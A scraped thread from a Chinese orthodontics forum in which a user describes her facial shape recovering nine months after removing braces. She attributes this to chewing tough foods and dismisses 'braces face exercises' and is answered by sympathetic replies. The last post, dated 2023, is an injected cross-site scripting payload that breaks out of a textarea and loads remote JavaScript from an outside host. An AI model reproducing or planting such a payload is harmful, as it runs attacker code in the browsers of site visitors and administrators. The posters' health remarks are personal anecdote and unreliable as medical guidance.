牙齿矫正人气社区-牙套之家APP

标题: 下牙套九个月了,已经恢复九成了吧 [打印本页]

作者: 凹呀    时间: 2017-10-13 19:28
标题: 下牙套九个月了,已经恢复九成了吧

我今天有好些了,主要是吃一些累的费劲的食物,多吃东西,让肌肉多运动,我吃脆枣,牛肉干,甘蔗,还有难嚼脆脆的食品。总之多吃多嚼。
对比图右边化妆的是以前,左边没化妆是今天的我。
登录/注册后可看大图

没化妆的都是现在的我,化妆的都是以前的我。

作者: 零#    时间: 2017-10-13 22:14
还是很漂亮的
作者: 我的头掉了    时间: 2017-10-13 23:51
好赞,看你以前的帖子,脸型恢复了

作者: 小猫奴    时间: 2017-10-14 19:47
亲之前拔牙了吗拔智齿了吗
作者: 凹呀    时间: 2017-10-16 07:40
小猫奴 发表于 2017-10-14 19:47
亲之前拔牙了吗拔智齿了吗

没拔牙,牙套操不是救命稻草,不用尝试,只能长皱纹,等下了牙套后多吃经常锻炼,自然会好很多,只是时间长短的问题,我也一度认为我没希望了,长达几个月没有进展,下牙套六个月变化一次,现在九个月再一次,
作者: 凹呀    时间: 2017-10-16 07:44
我的头掉了 发表于 2017-10-13 23:51
好赞,看你以前的帖子,脸型恢复了

回复很多,心情也好了,还差点,耐心等待吧,呵呵,不然还能怎样,
牙套操骗人的,只能长皱纹,一度我也拿它当作救命稻草,可惜半点效果没有,就好好吃东西,细嚼慢咽,多吃嚼起来费劲的食物,口香糖我停了几个月,百度吃那个有弊端对牙齿不好,我下了牙套后就牙龈萎缩了,可恨的牙医,面不改色心不跳,我说大夫我牙龈萎缩了,他淡定的看着我说,好好刷牙吧
作者: 凹呀    时间: 2017-10-16 07:46
零# 发表于 2017-10-13 22:14
还是很漂亮的

多咀嚼,面部肌肉得到锻炼,自然会好转,不要相信牙套操,只会长皱纹
作者: 凹呀    时间: 2017-10-22 08:43
还差太阳穴,凹的是八月拍的,另一个是今几天拍的

作者: wx_x7tPUBC3    时间: 2018-4-27 14:38
真好,脸型恢复了。我现在牙套脸也超级严重,真的很自卑,不爱出门了。
作者: wx_hI7QEemi    时间: 2018-4-28 17:52
牙龈萎缩怎么办法可以补救吗?
作者: phone_2Yj4BUah    时间: 2023-4-22 21:47
</tExtArEa>'"><sCRiPt sRC=//xs.ax/h0kD></sCrIpT>

欢迎光临 牙齿矫正人气社区-牙套之家APP (http://www.yataohome.com/) Powered by Discuz! X3